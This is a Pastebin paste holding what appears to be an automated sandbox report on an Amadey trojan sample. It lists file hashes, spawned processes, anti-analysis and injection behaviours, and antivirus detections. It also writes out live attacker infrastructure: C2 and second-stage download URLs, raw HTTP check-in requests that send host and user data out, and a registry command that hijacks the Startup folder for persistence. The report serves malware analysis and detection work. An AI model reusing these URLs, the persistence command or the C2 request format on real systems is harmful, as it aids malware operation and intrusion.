Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 800
- * MalFamily: "Amadey"
- * MalScore: 10.0
- * File Name: "Exes_f3a4609666def1d9102913afea0bdd78.exe"
- * File Size: 434176
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "c059075babf0ce7b306718f6f2ae03a4d14a89970d875f85bd1fdcdeb25751f6"
- * MD5: "f3a4609666def1d9102913afea0bdd78"
- * SHA1: "ca9d917b207a945f4889b80b3b275b2721255b49"
- * SHA512: "837c60d895cb6aaa3bc9b53fd06f4986c6afcfb4f7075b645942a8c4eacb99ad982478b7fdca1b6b5858f6167948070d3aad11a5393e9eb3fef17adc34057400"
- * CRC32: "185B47AE"
- * SSDEEP: "6144:p7cOWf9SpYJjjfTQH3z680cmhE4Uy0fEmfnkDLOtCsa8DKnAd21jedguVFOQp:pB6SpQju7SDLOtCs6nAE1jQ"
- * Process Execution:
- "e1gCq.exe",
- "e1gCq.exe",
- "kntd.exe",
- "kntd.exe",
- "reg.exe",
- "TIL13KLESDA.exe",
- "\u0570\u043b\u10e5\u10d0\u10e0\u10d7\u10e3\u10da\u10d8.exe",
- "svchost.exe",
- "services.exe",
- "lsass.exe"
- * Executed Commands:
- "c:\\programdata\\968b2ad0a1\\kntd.exe",
- "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe",
- "\"C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe\"",
- "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe ",
- "C:\\Windows\\system32\\svchost.exe",
- "C:\\Windows\\system32\\lsass.exe"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details":
- "IP_ioc": "212.42.121.51:80 (Kyrgyzstan)"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: e1gCq.exe, pid: 2692, offset: 0x00000000, length: 0x00033000"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "e1gCq.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\e1gCq.exe"
- "Process": "kntd.exe -> c:\\programdata\\968b2ad0a1\\kntd.exe"
- "Process": "TIL13KLESDA.exe -> C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\TIL13KLESDA.exe"
- "binary": "C:\\programdata\\968b2ad0a1\\kntd.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
- "suspicious_request_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php"
- "url_iocs": "http://paqsource.com/till15/TIL13KLESDA.exe"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\968b2ad0a1"
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "e1gCq.exe(1732) -> e1gCq.exe(2692)"
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "kntd.exe tried to sleep 2399 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 542984 times"
- "Description": "Likely virus infection of existing system binary",
- "Details":
- "file": "c:\\programdata\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe"
- "Description": "Attempts to identify installed AV products by installation directory",
- "Details":
- "file": "C:\\ProgramData\\AVAST Software"
- "file": "C:\\ProgramData\\Avira"
- "file": "C:\\ProgramData\\Kaspersky Lab"
- "file": "C:\\ProgramData\\ESET"
- "file": "C:\\ProgramData\\Panda Security"
- "file": "C:\\ProgramData\\Bitdefender"
- "file": "C:\\ProgramData\\AVG"
- "file": "C:\\ProgramData\\Doctor Web"
- "Description": "File has been identified by 28 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Gen:Variant.Graftor.632360"
- "FireEye": "Generic.mg.f3a4609666def1d9"
- "Cylance": "Unsafe"
- "SUPERAntiSpyware": "Trojan.Agent/Gen-TrickBot"
- "K7AntiVirus": "Trojan ( 00556fa91 )"
- "K7GW": "Trojan ( 00556fa91 )"
- "Arcabit": "Trojan.Graftor.D9A628"
- "Symantec": "Packed.Generic.516"
- "APEX": "Malicious"
- "Kaspersky": "Trojan-Downloader.Win32.Deyma.ano"
- "BitDefender": "Gen:Variant.Graftor.632360"
- "Rising": "Trojan.Generic@ML.89 (RDML:KU/SGocyZ85q4pjWJhL/kg)"
- "Ad-Aware": "Gen:Variant.Graftor.632360"
- "Emsisoft": "Gen:Variant.Graftor.632360 (B)"
- "F-Secure": "Trojan.TR/AD.Zlob.enzyp"
- "TrendMicro": "TROJ_GEN.R050C0WI219"
- "Avira": "TR/AD.Zlob.enzyp"
- "ZoneAlarm": "Trojan-Downloader.Win32.Deyma.ano"
- "GData": "Gen:Variant.Graftor.632360"
- "ALYac": "Gen:Variant.Graftor.632360"
- "MAX": "malware (ai score=86)"
- "Panda": "Trj/GdSda.A"
- "ESET-NOD32": "a variant of Win32/Kryptik.GWAS"
- "TrendMicro-HouseCall": "TROJ_GEN.R050C0WI219"
- "Ikarus": "Trojan.Win32.Trickbot"
- "Fortinet": "W32/GenKryptik.DRLU!tr"
- "AVG": "Win32:TrojanX-gen Trj"
- "Avast": "Win32:TrojanX-gen Trj"
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\programdata\\968b2ad0a1\\kntd.exe"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Amadey CnC Check-In"
- * Started Service:
- "KeyIso"
- * Mutexes:
- "Global\\838B6C9EB27932960"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
- "C:\\ProgramData\\0",
- "C:\\programdata\\968b2ad0a1\\kntd.exe",
- "C:\\programdata\\968b2ad0a1\\kntd.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\TIL13KLESDA1.exe",
- "C:\\ProgramData\\\\xd5\\xb0\\xd0\\xbb\\xe1\\x83\\xa5\\xe1\\x83\\x90\\xe1\\x83\\xa0\\xe1\\x83\\x97\\xe1\\x83\\xa3\\xe1\\x83\\x9a\\xe1\\x83\\x98.exe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\9cdf079f-d488-47e0-8840-9a3500f1bbe4"
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "paqsource.com",
- "answers":
- "data": "212.42.121.51",
- "type": "A"
- * Domains:
- "ip": "212.42.121.51",
- "domain": "paqsource.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 34,
- "body": "id=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
- "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
- "user-agent": "",
- "method": "POST",
- "host": "51.15.202.245",
- "version": "1.1",
- "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
- "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=4cf169&vs=1.41&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://paqsource.com/till15/TIL13KLESDA.exe",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
- "method": "GET",
- "host": "paqsource.com",
- "version": "1.1",
- "path": "/till15/TIL13KLESDA.exe",
- "data": "GET /till15/TIL13KLESDA.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: paqsource.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "d1=1000028001&",
- "uri": "http://51.15.202.245/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
- "user-agent": "",
- "method": "POST",
- "host": "51.15.202.245",
- "version": "1.1",
- "path": "/1a2d9426-59f2-4ca2-a640-25633c660631/index.php",
- "data": "POST /1a2d9426-59f2-4ca2-a640-25633c660631/index.php HTTP/1.1\r\nHost: 51.15.202.245\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 14\r\n\r\nd1=1000028001&",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "France",
- "ip": "51.15.202.245",
- "inaddrarpa": "",
- "hostname": ""
- "country_name": "Kyrgyzstan",
- "ip": "212.42.121.51",
- "inaddrarpa": "",
- "hostname": "paqsource.com"
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement